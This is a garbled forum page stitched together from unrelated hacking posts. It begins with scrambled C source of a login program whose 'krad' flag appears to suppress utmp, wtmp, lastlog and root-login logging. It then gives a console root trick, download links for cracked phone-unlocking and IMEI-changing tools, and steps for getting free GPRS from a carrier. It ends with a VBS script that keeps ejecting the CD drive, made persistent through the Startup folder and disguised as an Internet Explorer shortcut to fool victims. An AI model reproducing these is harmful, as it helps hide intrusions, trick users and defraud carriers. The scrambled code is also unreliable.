setuid(0); /* setreuid doesn't do it alone! */ setreuid(ruid, 0); setregid(-1, egid); } #ifndef linux #ifdef KERBEROS if (notickets && !quietlog) (void)printf("Warning: no Kerberos tickets issued\n"); #endif #define TWOWEEKS (14*24*60*60) if (pwd->pw_change || pwd->pw_expire) (void)gettimeofday(&tp, (struct timezone *)NULL); if (pwd->pw_change) if (tp.tv_sec >= pwd->pw_change) { (void)printf("Sorry -- your password has expired.\n"); sleepexit(1); } else if (tp.tv_sec - pwd->pw_change < TWOWEEKS && !quietlog) { ttp = localtime(&pwd->pw_change); (void)printf("Warning: your password expires on %s %d, %d\n", months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp>tm_year); } if (pwd->pw_expire) if (tp.tv_sec >= pwd->pw_expire) { (void)printf("Sorry -- your account has expired.\n"); >tm_year); sleepexit(1); } else if (tp.tv_sec - pwd->pw_expire < TWOWEEKS && !quietlog) { ttp = localtime(&pwd->pw_expire); (void)printf("Warning: your account expires on %s %d, %d\n", months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp} /* nothing else left to fail -- really log in */ { struct utmp utmp; memset((char *)&utmp, 0, sizeof(utmp)); (void)time(&utmp.ut_time); strncpy(utmp.ut_name, username, sizeof(utmp.ut_name)); if (hostname) strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host)); strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line)); login(&utmp); } #else /* for linux, write entries in utmp and wtmp */ { struct utmp ut; char *ttyabbrev; int wtmp; memset((char *)&ut, 0, sizeof(ut)); ut.ut_type = USER_PROCESS; ut.ut_pid = getpid(); strncpy(ut.ut_line, ttyn + sizeof("/dev/")-1, sizeof(ut.ut_line)); ttyabbrev = ttyn + sizeof("/dev/tty") - 1; strncpy(ut.ut_id, ttyabbrev, sizeof(ut.ut_id)); (void)time(&ut.ut_time); strncpy(ut.ut_user, username, sizeof(ut.ut_user)); /* fill in host and ip-addr fields when we get networking */ if (hostname) { struct hostent *he; strncpy(ut.ut_host, hostname, sizeof(ut.ut_host)); if ((he = gethostbyname(hostname))) memcpy(&ut.ut_addr, he->h_addr_list[0], sizeof(ut.ut_addr)); } utmpname(_PATH_UTMP); setutent(); if(krad == 0) pututline(&ut); endutent(); if((wtmp = open(_PATH_WTMP, O_APPEND|O_WRONLY)) >= 0) { flock(wtmp, LOCK_EX); if(krad == 0) write(wtmp, (char *)&ut, sizeof(ut)); } } #endif flock(wtmp, LOCK_UN); close(wtmp); /* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS); */ if(krad == 0) dolastlog(quietlog); #ifndef linux if (!hflag) { /* XXX */ static struct winsize win = { 0, 0, 0, 0 }; (void)ioctl(0, TIOCSWINSZ, &win); } #endif (void)chown(ttyn, pwd->pw_uid, (gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid); (void)chmod(ttyn, 0622); (void)setgid(pwd->pw_gid); initgroups(username, pwd->pw_gid); #ifdef HAVE_QUOTA quota(Q_DOWARN, pwd->pw_uid, (dev_t)-1, 0); #endif if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL; #ifndef linux /* turn on new line discipline for the csh */ else if (!strcmp(pwd->pw_shell, _PATH_CSHELL)) { ioctlval = NTTYDISC; (void)ioctl(0, TIOCSETD, &ioctlval); } #endif /* preserve TERM even without -p flag */ { char *ep; if(!((ep = getenv("TERM")) && (termenv = strdup(ep)))) termenv = "dumb"; } /* destroy environment unless user has requested preservation */ if (!pflag) { environ = (char**)malloc(sizeof(char*)); memset(environ, 0, sizeof(char*)); } #ifndef linux (void)setenv("HOME", pwd->pw_dir, 1); (void)setenv("SHELL", pwd->pw_shell, 1); if (term[0] == '\0') strncpy(term, stypeof(tty), sizeof(term)); (void)setenv("TERM", term, 0); (void)setenv("USER", pwd->pw_name, 1); (void)setenv("PATH", _PATH_DEFPATH, 0); #else (void)setenv("HOME", pwd->pw_dir, 0); /* legal to override */ if(pwd->pw_uid) (void)setenv("PATH", _PATH_DEFPATH, 1); else (void)setenv("PATH", _PATH_DEFPATH_ROOT, 1); (void)setenv("SHELL", pwd->pw_shell, 1); (void)setenv("TERM", termenv, 1); /* mailx will give a funny error msg if you forget this one */ (void)sprintf(tmp,"%s/%s",_PATH_MAILDIR,pwd->pw_name); (void)setenv("MAIL",tmp,0); /* LOGNAME is not documented in login(1) but HP-UX 6.5 does it. We'll not allow modifying it. */ (void)setenv("LOGNAME", pwd->pw_name, 1); #endif #ifndef linux if (tty[sizeof("tty")-1] == 'd') if(krad == 0) syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name); #endif if (pwd->pw_uid == 0) if(krad == 0) if (hostname) syslog(LOG_NOTICE, "ROOT LOGIN ON %s FROM %s", tty, hostname); else syslog(LOG_NOTICE, "ROOT LOGIN ON %s", tty); if (!quietlog) { struct stat st; motd(); (void)sprintf(tbuf, "%s/%s", _PATH_MAILDIR, pwd->pw_name); if (stat(tbuf, &st) == 0 && st.st_size != 0) (void)printf("You have %smail.\n", (st.st_mtime > st.st_atime) ? "new " : ""); } (void)signal(SIGALRM, SIG_DFL); (void)signal(SIGQUIT, SIG_DFL); (void)signal(SIGINT, SIG_DFL); (void)signal(SIGTSTP, SIG_IGN); (void)signal(SIGHUP, SIG_DFL); /* discard permissions last so can't get killed and drop core */ if(setuid(pwd->pw_uid) < 0 && pwd->pw_uid) { syslog(LOG_ALERT, "setuid() failed"); exit(1); } /* wait until here to change directory! */ if (chdir(pwd->pw_dir) < 0) { (void)printf("No directory %s!\n", pwd->pw_dir); if (chdir("/")) exit(0); pwd->pw_dir = "/"; (void)printf("Logging in with home = \"/\".\n"); } /* if the shell field has a space: treat it like a shell script */ if (strchr(pwd->pw_shell, ' ')) { char *buff = malloc(strlen(pwd->pw_shell) + 6); if (buff) { strcpy(buff, "exec "); strcat(buff, pwd->pw_shell); execlp("/bin/sh", "-sh", "-c", buff, (char *)0); fprintf(stderr, "login: couldn't exec shell script: %s.\n", strerror(errno)); exit(0); } fprintf(stderr, "login: no memory for shell script.\n"); exit(0); } tbuf[0] = '-'; strcpy(tbuf + 1, ((p = rindex(pwd->pw_shell, '/')) ? p + 1 : pwd->pw_shell)); execlp(pwd->pw_shell, tbuf, (char *)0); (void)fprintf(stderr, "login: no shell: %s.\n", strerror(errno)); exit(0); } void getloginname() { register int ch; register char *p; static char nbuf[UT_NAMESIZE + 1]; for (;;) { (void)printf("\n%s login: ", thishost); fflush(stdout); for (p = nbuf; (ch = getchar()) != '\n'; ) { if (ch == EOF) { badlogin(username); exit(0); } if (p < nbuf + UT_NAMESIZE) *p++ = ch; } if (p > nbuf) if (nbuf[0] == '-') (void)fprintf(stderr, "login names may not start with '-'.\n"); else { *p = '\0'; username = nbuf; break; } } } void timedout() { struct termio ti; (void)fprintf(stderr, "Login timed out after %d seconds\n", timeout); /* reset echo */ (void) ioctl(0, TCGETA, &ti); ti.c_lflag |= ECHO; (void) ioctl(0, TCSETA, &ti); exit(0); } int rootterm(ttyn) char *ttyn; #ifndef linux { struct ttyent *t; return((t = getttynam(ttyn)) && t->ty_status&TTY_SECURE); } #else { int fd; char buf[100],*p; int cnt, more; fd = open(SECURETTY, O_RDONLY); if(fd < 0) return 1; /* read each line in /etc/securetty, if a line matches our ttyline then root is allowed to login on this tty, and we should return true. */ for(;;) { p = buf; cnt = 100; while(--cnt >= 0 && (more = read(fd, p, 1)) == 1 && *p != '\n') p++; if(more && *p == '\n') { *p = '\0'; if(!strcmp(buf, ttyn)) { close(fd); return 1; } else continue; } else { close(fd); return 0; } } } #endif jmp_buf motdinterrupt; void motd() { register int fd, nchars; void (*oldint)(), sigint(); char tbuf[8192]; if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0) return; oldint = signal(SIGINT, sigint); if (setjmp(motdinterrupt) == 0) while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0) (void)write(fileno(stdout), tbuf, nchars); (void)signal(SIGINT, oldint); (void)close(fd); } void sigint() { longjmp(motdinterrupt, 1); } void checknologin() { register int fd, nchars; char tbuf[8192]; if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) { while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0) (void)write(fileno(stdout), tbuf, nchars); sleepexit(0); } } void dolastlog(quiet) int quiet; { struct lastlog ll; int fd; if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) { (void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET); if (!quiet) { if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) && ll.ll_time != 0) { (void)printf("Last login: %.*s ", 24-5, (char *)ctime(&ll.ll_time)); if (*ll.ll_host != '\0') printf("from %.*s\n", (int)sizeof(ll.ll_host), ll.ll_host); else printf("on %.*s\n", (int)sizeof(ll.ll_line), ll.ll_line); } memset((char *)&ll, 0, sizeof(ll)); (void)time(&ll.ll_time); strncpy(ll.ll_line, tty, sizeof(ll.ll_line)); if (hostname) strncpy(ll.ll_host, hostname, sizeof(ll.ll_host)); if(krad == 0) (void)write(fd, (char *)&ll, sizeof(ll)); (void)close(fd); } } } (void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET); void badlogin(name) char *name; { if (failures == 0) return; if (hostname) syslog(LOG_NOTICE, "%d failures, failures else syslog(LOG_NOTICE, "%d failures, failures } #undef #define UNKNOWN UNKNOWN "su" LOGIN FAILURE%s FROM %s, %s", > 1 ? "S" : "", hostname, name); LOGIN FAILURE%s ON %s, %s", > 1 ? "S" : "", tty, name); #ifndef linux char * stypeof(ttyid) char *ttyid; { struct ttyent *t; return(ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN); } #endif void checktty(user, tty) char *user; char *tty; { FILE *f; char buf[256]; char *ptr; char devname[50]; struct stat stb; /* no /etc/usertty, default to allow access */ if(!(f = fopen(_PATH_USERTTY, "r"))) return; while(fgets(buf, 255, f)) { /* strip comments */ for(ptr = buf; ptr < buf + 256; ptr++) if(*ptr == '#') *ptr = 0; strtok(buf, " \t"); if(strncmp(user, buf, 8) == 0) { while((ptr = strtok(NULL, "\t\n "))) { if(strncmp(tty, ptr, 10) == 0) { fclose(f); return; } if(strcmp("PTY", ptr) == 0) { #ifdef linux sprintf(devname, "/dev/%s", ptr); /* VERY linux dependent, recognize PTY as alias for all pseudo tty's */ if((stat(devname, &stb) >= 0) && major(stb.st_rdev) == 4 && minor(stb.st_rdev) >= 192) { fclose(f); return; } #endif } } /* if we get here, /etc/usertty exists, there's a line beginning with our username, but it doesn't contain the name of the tty where the user is trying to log in. So deny access! */ fclose(f); printf("Login on %s denied.\n", tty); badlogin(user); sleepexit(1); } } fclose(f); /* users not mentioned in /etc/usertty are by default allowed access on all tty's */ } void getstr(buf, cnt, err) char *buf, *err; int cnt; { char ch; do { if (read(0, &ch, sizeof(ch)) != sizeof(ch)) exit(1); if (--cnt < 0) { (void)fprintf(stderr, "%s too long\r\n", err); sleepexit(1); } *buf++ = ch; } while (ch); } void sleepexit(eval) int eval; { sleep((unsigned int)5); exit(eval); } So if you really wanna have root access and have access to console, reboot it (carefully, do a ctrl-alt-del) and at lilo prompt do a : init=/bin/bash rw (for linux 2.0.0 and above (I think)). Don't wonder why I was speaking only about rootshell and dhp.com, there are lots of other very good hacking pages, but these ones are updated very quickly and besides, are the best pages I know. So folks, this was it... First version of my USER's GUIDE 1.0. Maybe I'll do better next time, and if I have more time, I'll add about 50(more) other exploits, remote ones, new stuff, new techniques, etc... See ya, folks ! GOOD NIGHT !!! (it's 6.am now). DAMN !!! ARGHHH! I forgot... My e-mail adress is <phantom@XXXXXXXYOUWISHXXXXXXXX>. (for now).

Secret CD of Mobile Unlocking(BlackBerry Unlocking Software) and Repairing By crack0hack

punkey8oy — Fri, 25 Jul 2008 03:12:11 CDT

U can earn thousands from mobile reparing and unlocking.

it include various software.

EricsClient730gsm
Alcatel_unlockerv45
All Samsung Unlocker v1.30.exe
All_Siemens.exe
CruxCalc_v5_Setup.exe
DCT4 Calculator 1.4..#.exe
DCT4 Calculator 1.4.exe
Panasonic GD55 Unlocking Tool.exe
SmartDCT4CalcV201_setup.exe
Unlocking Phone BlackID â„¢.exe
UNLOCK c450 c550 c650 v80 v220 e380
Mobile Phone Unlocker and Repair Tools
Nokia-Samsung- Unlock
Panasonic GD92-93 Unlocker v1.0 By Wolfgang
Panasonic GD93 Unlocker v1.0 by Ghost3D
Panasonic_gd-67-97_unlocker
Samsung A800 Unlocker by Spunlock
Sharp GX10 Unlocker
Sharp GX10 Unlocker by UnlocKing
Siemans A50 unlocker
Siemens A35 - A40 All Unlocker
freia_v18_cracked.exe
SamsungSGH-Q1xxQ2xxServiceToolsVer1.00.EXE
Samsung_Unlocker_20.exe
Samsung A800 Unlock Imei Changer.exe
kNok-Phoenix2100_support
SmartDCT4CalcV201_setup.exe
k750flasher_13.7.exe
NokTest.exe
Panasonic_gd-67-97_unlocker
mobile phone tool 2.16 update
All Samsung Unlocker v1.30.exe
NokiaFREE_v310_Nokia_unlock_codes_calculator

sim_scan
All Nokia Unlocker 5.7.exe

and all blackberry

Ericsson_Unlock_Software
EricsClient730gsm.exe
CDMA Sony Ericsson AllEricssonTotalTool
SonyEricsson Logger 2.11
Ericsson.Tool.v17.by.Saras-RADiANCE
Main Flash
FileManager_2.5.9.0b.exe
LANGINFOGSM.EXE
ericson
windct
dct3
dct4
nokia
phoenix
GSM PINOUT DIAGRAM
ALL UNLOCKING SOFTWARE OF NOKIA,SONY ERICSON,BLACKBERRY,SAMSUNG,SIEMENS ETC.

and include circuit of various mobile what slot they use and circuit to repair mobile

it is very difficult to describe each tools.it includes 1686 files and 241 folders.

Download Now!!!

http://rapidshare.com/files/59864269/secret_of_mobile_unlocking_and_repairing_cd.part01.rar
http://rapidshare.com/files/59867862/secret_of_mobile_unlocking_and_repairing_cd.part02.rar
http://rapidshare.com/files/59871253/secret_of_mobile_unlocking_and_repairing_cd.part03.rar
http://rapidshare.com/files/59874648/secret_of_mobile_unlocking_and_repairing_cd.part04.rar
http://rapidshare.com/files/59877853/secret_of_mobile_unlocking_and_repairing_cd.part05.rar
http://rapidshare.com/files/59881235/secret_of_mobile_unlocking_and_repairing_cd.part06.rar
http://rapidshare.com/files/59884399/secret_of_mobile_unlocking_and_repairing_cd.part07.rar
http://rapidshare.com/files/59860520/secret_of_mobile_unlocking_and_repairing_cd.part08.rar
http://rapidshare.com/files/59860809/secret_of_mobile_unlocking_and_repairing_cd.part09.rar

Idea Hack for Free GPRS

punkey8oy — Fri, 25 Jul 2008 03:09:08 CDT

This is the new trick for the user of idea cellular.
cell phone or pc/laptop.....

Before starting the detailed procedure these things described as

#1... YOU MUST NOT HAVE CONNECTION !
#2... YOU MUST NOT HAVE ANY ACTIVE PLANS OF GPRS/INTERNET !
#3... YOU MUST HAVE PREPAID CONNECTION !( USING OF THIS TRICK IN

POST PAID WILL LEAD TO YOU HIGHER AMOUNT OF BILL )
#4... YOU MUST HAVE TO USE S60 DEVICES OR HIGHER..NEVER USE THIS

TRICK FOR THE S40 DEVICES(FOR CERTAIN S40 DEVICES THIS TRICK

WORKS)
#5... THIS TRICK HAS BEEN TESTED SUCCESSFULLY IN NOKIA AND SONY

ERICSSON DEVICES !

NOW COME TO THE PROCEDURE TO GET FREE INTERNET:

From your idea cell phone type GP13 and send it to 4444.
now you will receive that your GP13 pack will be activated within

24 hours...
now wait for 12 to 16 hours..
now send the same sms to 4444..
you will receive that your request has been already registered.
now again after 24 hours you will find that your GP13 pack has

been activated...!!!

BUT thats not a trick...yes because you have been have been

charged 13 rs because of activation of GP13..
real trick starts now..

After successfull activation of GP13 pack just send NOGP13 to

4444.(4444 No is free of charge)
you will receive that your GP13 pack will be deactivated within

24 hours..
now after just 10 to 12 hours of sending dectivation sms again

send GP13 to 4444..

now its enough ...you have completed your all steps to get free

internet..
its because due to last activation sms after deactivation sms

system will be hacked!!!System isnt able to take decision what to

do!!

now after some time of sending sms for activation just reboot

your system from file explorer..

now restart your device/cell..you are able to surf free..

but note that if you are using cell phone than use opera mini or

uc web browser and if you are using pc/laptop than use smart web

browser or opera 9.27.

if you wish to use proxy for your opera than you must have to use

the proxy given below.....

1.
i.p.Adderss: 12.148.192.178
Port :1080(common for all)

2.
i.p.Adderss: 63.127.192.178

3.
i.p.Adderss: 199.105.112.152

4.
i.p.Adderss: 199.105.112.163

5.
i.p.Adderss: 12.148.162.37.......

Cd drive hack

punkey8oy — Fri, 25 Jul 2008 03:04:36 CDT

Here jai147 will show you a basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till closed just copy paste this code into Notepad (any basic ANSI standard text editor) and save as CDfun.vbs and dont forget the .vbs part

set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()

now this is funny but what if it was even funnier. what if every time you started you r computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.

1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs

Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.

How to stop This Thing???
open
task Manager > processes> wscript.exe
right click on it > end process tree.

done

cheers.........